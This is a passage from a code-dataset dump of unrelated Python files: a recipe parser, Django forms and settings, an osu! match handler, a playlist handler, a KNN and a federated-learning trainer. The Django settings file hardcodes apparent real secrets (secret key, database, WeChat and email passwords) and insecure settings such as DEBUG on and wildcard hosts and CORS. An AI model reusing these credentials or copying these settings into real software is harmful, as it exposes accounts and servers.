shell=True)\n\n","repo_name":"istvanaut/TK-MachineLearning","sub_path":"AGVCar/NerualNetworks/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26673064812","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\nimport readchar\n\nrecipesFile = open('recipes.xml','r')\nrecipesOutput = open('recipes.txt', 'w')\ntitlesOutput = open('titles.txt', 'w')\ningredientsFile = open('ingredients.txt', 'w')\n\nshouldCapture = False\n\nisRecipe = False\nhasIngredients = False\nhasDirections = False\nhasCategory = False\nhasDescription = False\nnumberOfRecipes = 0\nnumberWithCategories = 0\nfractions = {'½': '.5', '⅓':'.334', '⅔':'.667', '¼':'.25', '¾':'.75', '⅕':'.2',\n '⅖':'.4', '⅗':'.6', '⅘':'.8', '⅙':'.167', '⅚':'.834', '⅐':'.143',\n '⅛': '.125', '⅜': '.375', '⅝':'.625', '⅞':'.875', '⅑':'.111',\n '⅒':'.1'}\naddThese = []\ncategories = []\ningredients = set([])\nregex = re.compile('\\[\\[[^a-zA-Z]\\]\\]')\n\nfor line in recipesFile:\n\n text = line.strip()\n\n if '' in text:\n title = text\n title = title.replace('<title>', '')\n title = title.replace('', '')\n if 'Category:' in text:\n hasCategory = True\n if 'Description' in text:\n hasDescription = True\n if re.search(r'[Ii]ngredients', text):\n hasIngredients = True\n shouldCapture = True\n if 'Directions' in text:\n hasDirections = True\n\n if '' in text:\n # May include recipes having hasDescription, hasIngredients,\n # hasDirections, hasCategory\n if hasIngredients and hasDirections:\n \"\"\"for i in range(len(addThese)):\n for key, value in fractions.items():\n if key in addThese[i]:\n addThese[i] = re.sub(key, fractions[key], addThese[i])\"\"\"\n recipesOutput.write(\"==title==\" + '\\n')\n recipesOutput.write(title + '\\n')\n titlesOutput.write(title + '\\n')\n atDirections = False\n for addLine in addThese:\n if not 
atDirections:\n if re.search(r'[Dd]irections', addLine):\n atDirections = True\n recipesOutput.write(\"==directions==\" + '\\n')\n else:\n \"\"\"findIngs = re.findall(r'\\[\\[[a-z |]+\\]\\]', addLine)\n for w in findIngs:\n ingredients.add(w) \"\"\"# .lower() ?\n if re.search(r'[Ii]ngredients', addLine):\n recipesOutput.write(\"==ingredients==\" + '\\n')\n else:\n recipesOutput.write(addLine.lower().strip() + '\\n')\n else:\n recipesOutput.write(addLine + '\\n')\n recipesOutput.write(text.replace('', '') + '\\n')\n recipesOutput.write('==end==\\n')\n numberOfRecipes += 1\n title = \"\"\n addThese = []\n shouldCapture = False\n hasDescription = False\n hasIngredients = False\n hasDirections = False\n hasCategory = False\n if hasIngredients:\n if \"[[File\" not in text and \"Videos\" not in text:\n text = re.sub(r\"<.*>\", \"\", text)\n text = re.sub(r\"'''\", \"\", text)\n if 'Category:' in text:\n category = re.sub(r'\\[\\[Category:', '', text)\n category = re.sub(r'\\]\\]', '', category)\n categories.append(category.lower())\n if '' in text:\n text = text.replace('', '')\n addThese.append(text)\n\n\n\"\"\"\nprint(\"The number of recipes added was:\", str(numberOfRecipes))\nprint(\"The total number of unique categories:\", len(set(categories)))\nprint(\"Number of ingredients:\", len(ingredients))\n\"\"\"\n\ningredientsList = sorted(list(ingredients))\nnewIngredientsList = []\nfor i in ingredientsList:\n ing = i\n ingredientsFile.write(ing)\n newIngredientsList.append(ing)\n\nrecipesFile.close()\ningredientsFile.close()\nrecipesOutput.close()\ntitlesOutput.close()\n\"\"\"\nrecipeItemsWOIngredient = []\nrecipes = open('recipes.txt', 'r')\n\nisIngredients = False\nfor r in recipes:\n text = r\n text = text.lower()\n if re.search(r'[= ]+[Ii]ngredients[= ]+', text):\n isIngredients = True\n elif re.search(r'[= ]+[Dd]irections[= ]+', text):\n isIngredients = False\n elif re.search(r'[= ]+[Dd]escription[= ]+', text):\n isIngredients = False\n elif isIngredients and re.search('[a-zA-Z]', text):\n for i in range(len(newIngredientsList)):\n if newIngredientsList[i] in text:\n break\n if i == len(newIngredientsList) - 1:\n recipeItemsWOIngredient.append(text)\"\"\"\n\"\"\"\nris = getRecipeItems()\nfor i in range(100):\n print(next(ris))\nrecipes.close()\nprint(sorted(recipeItemsWOIngredient))\nprint(len(recipeItemsWOIngredient))\"\"\"\n# print(len(ingredients))\n","repo_name":"gripitt/recipe","sub_path":"resources/regexParser.py","file_name":"regexParser.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43629899555","text":"from __future__ import absolute_import, unicode_literals\nimport os\n\n# Celery settings\n\nCELERY_BROKER_URL = 'amqp://guest:guest@localhost//'\n\n#: Only add pickle to this list if your broker is secured\n#: from unwanted access (see userguide/security.html)\nCELERY_ACCEPT_CONTENT = ['json']\nCELERY_RESULT_BACKEND = 'db+sqlite:///results.sqlite'\nCELERY_TASK_SERIALIZER = 'json'\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '%!tk$*mhe*8ox(w3l_6a#%oo-8(0onzobuzrzw5^!aos)r=e)y'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = 
True\n\nALLOWED_HOSTS = ['127.0.0.1', 'localhost', '*']\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'corsheaders',\n # 'django_celery_results',\n 'rest_framework',\n 'authentication',\n 'user_info',\n 'campus',\n 'channel',\n 'coupon',\n 'course',\n 'order',\n 'project',\n 'student',\n 'log_info',\n 'payment',\n 'record',\n 'student_course',\n 'complain',\n 'message',\n 'common',\n]\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'middleware.auth_middle.AuthMiddleware',\n]\n\nCORS_ORIGIN_ALLOW_ALL = True\n\nCORS_ALLOW_HEADERS = (\n 'x-requested-with',\n 'content-type',\n 'accept',\n 'origin',\n 'authorization',\n 'x-csrftoken'\n)\n\nROOT_URLCONF = 'StudentManageSys.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',\n 'PAGE_SIZE': 15,\n 'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend', 'rest_framework.filters.SearchFilter'),\n 'DEFAULT_RENDERER_CLASSES': (\n 'utils.renderers.CustomJsonRender',\n 'rest_framework.renderers.BrowsableAPIRenderer',\n ),\n 'TEST_REQUEST_DEFAULT_FORMAT': 'json',\n 'EXCEPTION_HANDLER': 'utils.handlers.exception_handler'\n}\n\nWSGI_APPLICATION = 'StudentManageSys.wsgi.application'\n\nLOG_ROOT = os.path.join(BASE_DIR, 'logs')\nif not os.path.isdir(LOG_ROOT):\n os.makedirs(LOG_ROOT)\n\n# 日志系统\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '%(asctime)s [%(threadName)s:%(thread)d] [%(name)s:%(lineno)d] [%(levelname)s]- %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(asctime)s %(message)s'\n }\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.TimedRotatingFileHandler',\n 'filename': '%s/log.log' % LOG_ROOT,\n 'formatter': 'simple'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'default',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': False\n },\n 'django.request': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': False\n },\n 'django.db': {\n 'handlers': ['console'],\n 'propagate': False,\n 'level': 'DEBUG',\n }\n }\n}\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'student_manage_sys',\n 'USER': 'root',\n 'PASSWORD': '123456',\n 'HOST': 'localhost',\n 'PORT': 3306,\n 'CHARSET': 'UTF-8',\n 'ATOMIC_REQUESTS': True,\n 'OPTIONS': {'charset': 'utf8mb4'},\n }\n}\n\n# Password 
validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = False\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\n# 系统启动默认创建media文件夹\nif not os.path.exists(MEDIA_ROOT):\n os.mkdir(MEDIA_ROOT)\n# 系统启动默认创建media/channel文件夹存放渠道二维码\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'channel')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'channel'))\n# 系统启动默认创建media/agreement文件夹存放学生电子协议图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'agreement')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'agreement'))\n# 系统启动默认创建media/transcript文件夹存放学生成绩单\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'transcript')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'transcript'))\n# 系统启动默认创建media/IDcard1文件夹存放学生身份证图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'IDcard1')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'IDcard1'))\n# 系统启动默认创建media/IDcard2文件夹存放学生身份证图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'IDcard2')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'IDcard2'))\n# 系统启动默认创建media/IDcard1文件夹存放学生订单支付信息图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'order')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'order'))\n# 系统启动默认创建media/images/user_qrcode文件夹存放系统用户二维码\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'images/user_qrcode')):\n os.makedirs(os.path.join(MEDIA_ROOT, 'images/user_qrcode'))\n# 系统启动默认创建media/images/certificate文件夹存放系统审课图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'images/certificate')):\n os.makedirs(os.path.join(MEDIA_ROOT, 'images/certificate'))\n# 系统启动默认创建media/images/convert文件夹存放系统审课图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'images/convert')):\n os.makedirs(os.path.join(MEDIA_ROOT, 'images/convert'))\n# 系统启动默认创建media/images/complain文件夹存放用户投诉图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'images/complain')):\n os.makedirs(os.path.join(MEDIA_ROOT, 'images/complain'))\n\n# redis 配置\nREDIS_CONFIG = {\n 'host': 'localhost',\n 'port': 6379\n}\n# elastic-search 配置\nELASTIC_SEARCH_CONFIG = {\n 'host': '47.105.104.233',\n 'port': 9200\n}\n\n# 生成token需要的秘钥\nSECURE_KEY = {\n 'SECRET_KEY': '785CHINASUMMER85ISWONDERFUL89HAHA42',\n 'AUTH_SALT': 'A1FE3FGE4RW5G9'\n}\n\n# 配置不需要认证的后端url\nignore_auth_urls = ['/api/v1/student/info/authorize', '/api/v1/user_info/login/']\n\n# 服务器域名\nDOMAIN = 'http://student_test.lxhelper.com'\n\nMEDIA_URL = '/media/'\n\n# 公众号消息推送模板编号\ntemplate_info = {\n 'match_success': 'YeMDfDi25UrcAWLV4GKT2YV3ihrV6LxZH_EZwVxWAVo',\n 'invite_success': '5QiQJNjdkcOSSPgx5W4A0xEBXTuITRwT62YcdOro_iU',\n 'attend_result_notice': 'px45KahMC3zCEXe78el4-tHBYQtBFrtwvwQY3JW0xw8'\n}\n\n# 微信公众号配置\nWX_CONFIG = {\n 'APP_ID': 'wx622bf44e0bee4f2b',\n 'APP_SECRET': '97d4204adeb370336439e67bab275155'\n}\n\n# Django 邮件服务器配置\n\n# 这一项是固定的\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n# smtp服务的邮箱服务器 我用的是163\nEMAIL_HOST = 'smtp.qq.com'\n# smtp服务固定的端口是25\nEMAIL_PORT = 25\n# 
发送邮件的邮箱\nEMAIL_HOST_USER = '52100141@qq.com'\n# 在邮箱中设置的客户端授权密码\nEMAIL_HOST_PASSWORD = 'kfznegjwtjfhbjbj'\n# 收件人看到的发件人 <此处要和发送邮件的邮箱相同>\nEMAIL_FROM = 'python<52100141@qq.com>'\n","repo_name":"liaochenghao/studentsys","sub_path":"StudentManageSys/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":9309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"865350116","text":"import random\n\nfrom common import generalUtils\nfrom common.log import logUtils as log\nfrom constants import clientPackets\nfrom constants import matchModModes\nfrom constants import matchTeamTypes\nfrom constants import matchTeams\nfrom constants import slotStatuses\nfrom objects import glob\n\n\ndef handle(userToken, packetData):\n\t# Read new settings\n\tpacketData = clientPackets.changeMatchSettings(packetData)\n\n\t# Get match ID\n\tmatchID = userToken.matchID\n\t\t\n\t# Make sure the match exists\n\tif matchID not in glob.matches.matches:\n\t\treturn\n\n\t# Host check\n\twith glob.matches.matches[matchID] as match:\n\t\tif userToken.userID != match.hostUserID:\n\t\t\treturn\n\n\t\t# Some dank memes easter egg\n\t\tmemeTitles = [\n\t\t\t\"RWC 2020\",\n\t\t\t\"Fokabot is a duck\",\n\t\t\t\"Dank memes\",\n\t\t\t\"1337ms Ping\",\n\t\t\t\"Iscriviti a Xenotoze\",\n\t\t\t\"...e i marò?\",\n\t\t\t\"Superman dies\",\n\t\t\t\"The brace is on fire\",\n\t\t\t\"print_foot()\",\n\t\t\t\"#FREEZEBARKEZ\",\n\t\t\t\"Ripple devs are actually cats\",\n\t\t\t\"Thank Mr Shaural\",\n\t\t\t\"NEVER GIVE UP\",\n\t\t\t\"T I E D W I T H U N I T E D\",\n\t\t\t\"HIGHEST HDHR LOBBY OF ALL TIME\",\n\t\t\t\"This is gasoline and I set myself on fire\",\n\t\t\t\"Everyone is cheating apparently\",\n\t\t\t\"Kurwa mac\",\n\t\t\t\"TATOE\",\n\t\t\t\"This is not your drama landfill.\",\n\t\t\t\"I like cheese\",\n\t\t\t\"NYO IS NOT A CAT HE IS A DO(N)G\",\n\t\t\t\"Datingu startuato\"\n\t\t]\n\n\t\t# Set match name\n\t\tmatch.matchName = packetData[\"matchName\"] if packetData[\"matchName\"] != \"meme\" else random.choice(memeTitles)\n\n\t\t# Update match settings\n\t\tmatch.inProgress = packetData[\"inProgress\"]\n\t\tif packetData[\"matchPassword\"] != \"\":\n\t\t\tmatch.matchPassword = generalUtils.stringMd5(packetData[\"matchPassword\"])\n\t\telse:\n\t\t\tmatch.matchPassword = \"\"\n\t\tmatch.beatmapName = packetData[\"beatmapName\"]\n\t\tmatch.beatmapID = packetData[\"beatmapID\"]\n\t\tmatch.hostUserID = packetData[\"hostUserID\"]\n\t\tmatch.gameMode = packetData[\"gameMode\"]\n\n\t\toldBeatmapMD5 = match.beatmapMD5\n\t\toldMods = match.mods\n\t\toldMatchTeamType = match.matchTeamType\n\n\t\tmatch.mods = packetData[\"mods\"]\n\t\tmatch.beatmapMD5 = packetData[\"beatmapMD5\"]\n\t\tmatch.matchScoringType = packetData[\"scoringType\"]\n\t\tmatch.matchTeamType = packetData[\"teamType\"]\n\t\tmatch.matchModMode = packetData[\"freeMods\"]\n\n\t\t# Reset ready if needed\n\t\tif oldMods != match.mods or oldBeatmapMD5 != match.beatmapMD5:\n\t\t\tmatch.resetReady()\n\n\t\t# Reset mods if needed\n\t\tif match.matchModMode == matchModModes.NORMAL:\n\t\t\t# Reset slot mods if not freeMods\n\t\t\tmatch.resetMods()\n\t\telse:\n\t\t\t# Reset match mods if freemod\n\t\t\tmatch.mods = 0\n\n\t\t# Initialize teams if team type changed\n\t\tif match.matchTeamType != oldMatchTeamType:\n\t\t\tmatch.initializeTeams()\n\n\t\t# Force no freemods if tag coop\n\t\tif match.matchTeamType == matchTeamTypes.TAG_COOP or match.matchTeamType == matchTeamTypes.TAG_TEAM_VS:\n\t\t\tmatch.matchModMode = 
matchModModes.NORMAL\n\n\t\t# Send updated settings\n\t\tmatch.sendUpdates()\n\n\t\t# Console output\n\t\tlog.info(\"MPROOM{}: Updated room settings\".format(match.matchID))\n","repo_name":"osuripple/pep.py","sub_path":"events/changeMatchSettingsEvent.py","file_name":"changeMatchSettingsEvent.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"74264948006","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.db.models import Avg\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom nolsatu_courses.apps.courses.models import (\n Courses, Batch, CollectTask, )\nfrom nolsatu_courses.backoffice.tasks.forms import FormFilterTask, FormFilterTaskReport\n\n\nclass TrainerFormFilterTask(FormFilterTask):\n\n def __init__(self, *args, **kwargs):\n user_email = kwargs.pop('user_email', None)\n self.tasks = None\n super(TrainerFormFilterTask, self).__init__(*args, **kwargs)\n self.fields['course'].queryset = Courses.objects.filter(batchs__teaches__user__email=user_email)\n self.fields['batch'].queryset = Batch.objects.filter(teaches__user__email=user_email)\n\n\nclass TrainerFormFilterTaskReport(FormFilterTaskReport):\n batch = forms.ModelChoiceField(\n queryset=Batch.objects.all(), empty_label=_(\"Pilih Angkatan\"))\n\n def get_data(self):\n course = self.cleaned_data['course']\n batch = self.cleaned_data['batch']\n\n users = User.objects\n\n if course:\n users = users.filter(enroll__course=course)\n\n if batch:\n users = users.filter(enroll__batch=batch)\n\n avg_score = CollectTask.objects.filter(\n section__module__course=course\n ).values(\"user\").annotate(avg_score=Avg(\"score\"))\n\n avg_score = {d['user']: d['avg_score'] for d in avg_score}\n\n return users, avg_score, batch\n\n def __init__(self, *args, **kwargs):\n user_email = kwargs.pop('user_email', None)\n self.tasks = None\n super(FormFilterTaskReport, self).__init__(*args, **kwargs)\n self.fields['course'].queryset = Courses.objects.filter(batchs__teaches__user__email=user_email)\n self.fields['batch'].queryset = Batch.objects.filter(teaches__user__email=user_email)\n","repo_name":"nolsatuid/courses","sub_path":"nolsatu_courses/teachersroom/tasks/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34851321275","text":"__author__ = \\\n 'jeffy@google.com (Jeff Posnick) and jjinux@google.com (JJ Behrens)'\n\nfrom playlistpicker.handlers.basehandler import BaseHandler\nfrom playlistpicker.utils import channels as channelutils\nfrom playlistpicker.utils import youtube as youtubeutils\n\n\nclass MovePlaylistEntryHandler(BaseHandler):\n @BaseHandler.oauth2_decorator.oauth_required\n @BaseHandler.authorize_playlist\n @BaseHandler.playlist_entry_uri_required\n def post(self, playlist_id):\n position = int(self.request.get(\"position\"))\n yt_service_for_owner = youtubeutils.create_youtube_service(\n self.owner_oauth_token)\n response = yt_service_for_owner.UpdatePlaylistVideoEntryMetaData(\n self.playlist_uri, self.playlist_entry_id, None, None, position)\n assert response\n youtubeutils.write_playlist(self, yt_service_for_owner, playlist_id,\n 
channelutils.notify_playlist_listeners)\n\n\n","repo_name":"jjinux/party-playlist-picker","sub_path":"playlistpicker/handlers/moveplaylistentryhandler.py","file_name":"moveplaylistentryhandler.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328585768","text":"import os\nimport logging\n\nimport joblib\nimport numpy as np\n\nfrom torch.optim import SGD\nfrom torch.utils.data import TensorDataset\n\nfrom scipy.sparse import csr_matrix\nfrom sklearn.neighbors import NearestNeighbors\nfrom annoy import AnnoyIndex\n\nfrom knodle.transformation.majority import input_to_majority_vote_input\nfrom knodle.transformation.torch_input import input_labels_to_tensordataset\n\nfrom knodle.trainer.auto_trainer import AutoTrainer\nfrom knodle.trainer.baseline.majority import MajorityVoteTrainer\nfrom knodle.trainer.knn_aggregation.config import KNNConfig\nfrom knodle.trainer.utils.denoise import activate_neighbors\n\nlogger = logging.getLogger(__name__)\n\n\n@AutoTrainer.register('knn')\nclass KNNAggregationTrainer(MajorityVoteTrainer):\n def __init__(\n self,\n knn_feature_matrix: np.ndarray = None,\n **kwargs\n ):\n if kwargs.get(\"trainer_config\") is None:\n kwargs[\"trainer_config\"] = KNNConfig(optimizer=SGD, lr=0.001)\n super().__init__(**kwargs)\n\n if knn_feature_matrix is None:\n self.knn_feature_matrix = csr_matrix(self.model_input_x.tensors[0].numpy())\n else:\n self.knn_feature_matrix = knn_feature_matrix\n\n def train(\n self,\n model_input_x: TensorDataset = None, rule_matches_z: np.ndarray = None,\n dev_model_input_x: TensorDataset = None, dev_gold_labels_y: TensorDataset = None\n ):\n self._load_train_params(model_input_x, rule_matches_z, dev_model_input_x, dev_gold_labels_y)\n self._apply_rule_reduction()\n\n # initialise optimizer\n self.trainer_config.optimizer = self.initialise_optimizer()\n\n self.rule_matches_z = self.rule_matches_z.astype(np.int8)\n self.mapping_rules_labels_t = self.mapping_rules_labels_t.astype(np.int8)\n\n self._knn_denoise_rule_matches()\n\n self.model_input_x, noisy_input_y, self.rule_matches_z = input_to_majority_vote_input(\n self.rule_matches_z, self.mapping_rules_labels_t.astype(np.int64), self.model_input_x,\n use_probabilistic_labels=self.trainer_config.use_probabilistic_labels,\n filter_non_labelled=self.trainer_config.filter_non_labelled,\n probability_threshold=self.trainer_config.probability_threshold,\n other_class_id=self.trainer_config.other_class_id,\n multi_label=self.trainer_config.multi_label,\n multi_label_threshold=self.trainer_config.multi_label_threshold\n )\n\n feature_label_dataset = input_labels_to_tensordataset(self.model_input_x, noisy_input_y)\n feature_label_dataloader = self._make_dataloader(feature_label_dataset)\n\n self._train_loop(feature_label_dataloader)\n\n def _knn_denoise_rule_matches(self) -> np.ndarray:\n \"\"\"\n Denoises the applied weak supervision source.\n Args:\n rule_matches_z: Matrix with all applied weak supervision sources. Shape: (Instances x Rules)\n Returns: Denoised / Improved applied labeling function matrix. 
Shape: (Instances x Rules)\n \"\"\"\n k = self.trainer_config.k\n if k == 1:\n return self.rule_matches_z\n\n # load cached data, if available\n if self.trainer_config.caching_folder:\n cache_file = self.trainer_config.get_cache_file()\n if os.path.isfile(cache_file):\n logger.info(f\"Loaded knn matrix from cache: {cache_file}\")\n return joblib.load(cache_file)\n\n logger.info(f\"Start denoising labeling functions with k: {k}.\")\n\n # ignore zero-match rows for knn construction & activation\n if self.trainer_config.activate_no_match_instances:\n ignore = np.zeros((self.knn_feature_matrix.shape[0],), dtype=np.bool)\n else:\n ignore = self.rule_matches_z.sum(-1) == 0\n\n # Set up data structure, to quickly find nearest neighbors\n if self.trainer_config.use_approximation:\n # use annoy fast ANN\n if k is not None:\n knn_matrix_shape = self.knn_feature_matrix.shape\n\n logger.info(\"Creating annoy index...\")\n t = AnnoyIndex(knn_matrix_shape[1], 'dot')\n for i, v in enumerate(self.knn_feature_matrix):\n if not ignore[i]:\n t.add_item(i, v)\n\n t.build(10, n_jobs=self.trainer_config.n_jobs)\n\n self.knn_feature_matrix = None\n\n logger.info(\"Retrieving neighbor indices...\")\n indices = ( # make a generator: no memory is allocated at this moment\n np.array(t.get_nns_by_item(i, k, search_k=-1, include_distances=False))\n if not ignore[i] else np.array([])\n for i in range(knn_matrix_shape[0])\n )\n else:\n # possible radius implementation; delete error in config then\n pass\n else:\n # use standard precise kNN\n if k is not None:\n logger.info(\"Creating NN index...\")\n neighbors = NearestNeighbors(n_neighbors=k, n_jobs=self.trainer_config.n_jobs)\\\n .fit(self.knn_feature_matrix)\n logger.info(\"Retrieving neighbor indices...\")\n indices = neighbors.kneighbors(self.knn_feature_matrix, n_neighbors=k, return_distance=False)\n else:\n logger.info(\"Creating NN index...\")\n neighbors = NearestNeighbors(radius=self.trainer_config.radius, n_jobs=self.trainer_config.n_jobs)\\\n .fit(self.knn_feature_matrix)\n logger.info(\"Retrieving neighbor indices...\")\n indices = neighbors.radius_neighbors(self.knn_feature_matrix, return_distance=False)\n\n # activate matches.\n logger.info(\"Activating neighbors...\")\n self.rule_matches_z = activate_neighbors(self.rule_matches_z, indices)\n\n # save data for caching\n if self.trainer_config.caching_folder:\n os.makedirs(self.trainer_config.caching_folder, exist_ok=True)\n joblib.dump(self.rule_matches_z, cache_file)\n\n return self.rule_matches_z\n\n def print_step_update(self, step: int, max_steps: int):\n if step % 40 == 0 and not step == 0:\n logger.info(f\" Batch {step} of {max_steps}.\")\n","repo_name":"knodle/knodle","sub_path":"knodle/trainer/knn_aggregation/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"32129474365","text":"import json\nimport pandas as pd\ndata_file = open(\"yelp_academic_dataset_checkin.json\")\ndata = []\nfor line in data_file:\n data.append(json.loads(line))\ncheckin_df = pd.DataFrame(data)\ndata_file.close()\nprint(\"Shape is: \" + str(checkin_df.shape))\nprint(checkin_df.head())","repo_name":"maxsicherman/Yelp-Project","sub_path":"Yelp_data.py","file_name":"Yelp_data.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"557600623","text":"from src.trainers.base import BaseTrainer\nfrom 
src.models.model import choose_model\nfrom src.models.worker import LrdWorker\nfrom src.optimizers.gd import GD\nimport numpy as np\nimport math\nimport torch\n\ncriterion = torch.nn.CrossEntropyLoss()\n\n\nclass FedAvg4Trainer(BaseTrainer):\n \"\"\"\n Scheme I and Scheme II, based on the flag of self.simple_average\n \"\"\"\n\n def __init__(self, options, dataset):\n self.data_num = list()\n\n self.model = choose_model(options)\n self.move_model_to_gpu(self.model, options)\n\n self.optimizer = GD(self.model.parameters(), lr=options['lr'], weight_decay=options['wd'])\n self.num_epoch = options['num_epoch'] # E\n worker = LrdWorker(self.model, self.optimizer, options)\n super(FedAvg4Trainer, self).__init__(options, dataset, worker=worker)\n\n self.selected_times = [0 for i in range(self.clients_num)]\n\n self.prob = self.compute_prob()\n\n # privacy loss related parameters\n self.delta = 1e-5\n self.sigma = 0.9\n self.l_max = 32\n self.epsilon = 0\n self.w_clip = 60\n self.km = [[0 for i in range(self.l_max + 1)] for j in range(self.clients_num)]\n\n def local_train(self, round_i, selected_clients, **kwargs):\n \"\"\"Training procedure for selected local clients\n\n Args:\n round_i: i-th round training\n selected_clients: list of selected clients\n\n Returns:\n solns: local solutions, list of the tuple (num_sample, local_solution)\n stats: Dict of some statistics\n \"\"\"\n solns = [] # Buffer for receiving client solutions\n stats = [] # Buffer for receiving client communication costs\n for i, c in enumerate(selected_clients, start=1):\n # Communicate the latest model\n c.set_flat_model_params(self.latest_model)\n\n # Solve minimization locally\n soln, stat = c.local_train()\n\n # Compute the LDP privacy loss for each client\n pl = self.compute_privacy_loss_advanced(self.selected_times[c.cid], c.cid)\n self.epsilon = max(self.epsilon, pl)\n if self.print_result:\n print(\"Round: {:>2d} | CID: {: >3d} ({:>2d}/{:>2d})| \"\n \"Privacy Loss: {:>.5f} | \"\n \"Param: norm {:>.4f} ({:>.4f}->{:>.4f})| \"\n \"Loss {:>.4f} | Acc {:>5.2f}% | Time: {:>.2f}s\".format(\n round_i, c.cid, i, self.clients_per_round,\n pl, # the accumulated privacy loss for the client\n stat['norm'], stat['min'], stat['max'],\n stat['loss'], stat['acc'] * 100, stat['time']))\n\n # Add solutions and stats\n solns.append(soln)\n stats.append(stat)\n\n return solns, stats\n\n def train(self):\n print('>>> Select {} clients per round \\n'.format(self.clients_per_round))\n\n # Fetch latest flat model parameter\n self.latest_model = self.worker.get_flat_model_params().detach()\n\n # initialization for pl\n self.init_coefficient()\n\n for round_i in range(self.num_round):\n # Test latest model on train data\n self.test_latest_model_on_traindata(round_i)\n self.test_latest_model_on_evaldata(round_i)\n\n # 